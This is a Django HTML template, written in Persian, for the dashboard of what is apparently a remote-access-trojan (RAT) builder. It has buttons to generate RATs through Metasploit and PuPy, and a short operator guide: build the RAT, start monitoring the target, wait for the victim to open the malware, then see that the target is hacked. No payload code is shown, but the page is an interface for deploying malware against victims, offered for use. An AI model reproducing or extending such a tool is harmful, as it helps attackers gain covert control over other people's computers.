{% extends "base_generic.html" %}

{% block content %}


<h2>{{ user.get_username }} عزیز خوش آمدید</h2>
<div style="float:left;">


<div class="dash-box">
<div class="w3-half" >
  <a href="{% url 'RAT:msf_index' %}" class="w3-button w3-block w3-green w3-section" id="dash-meta">تولید رت از طریق MetaSploit</a>
</div>
<div class="w3-half">
  <a href="{% url 'RAT:pupy_index' %}" class="w3-button w3-block w3-red w3-section" id="dash-pupy">تولید رت از طریق PuPy</a>
</div>
</div>
<div class="dash-box">
<p><h3>آموزش استفاده از سیستم:</h3><br>ابتدا از قسمت ساخت رت اقدام به ساخت رت مایید سپس دوبار روی گرفتن دسترسی کلیک کنید و در منوی مدیریت رت دکمه شروع برسی تارگت کلیک کنید حال منتظر بمانید تا تارگت بدافزار را باز کند سپس در همان صفحه خواهید دید که تارگت مورد نظر هک شده است.</p>
</div>
</div>
{% endblock %}
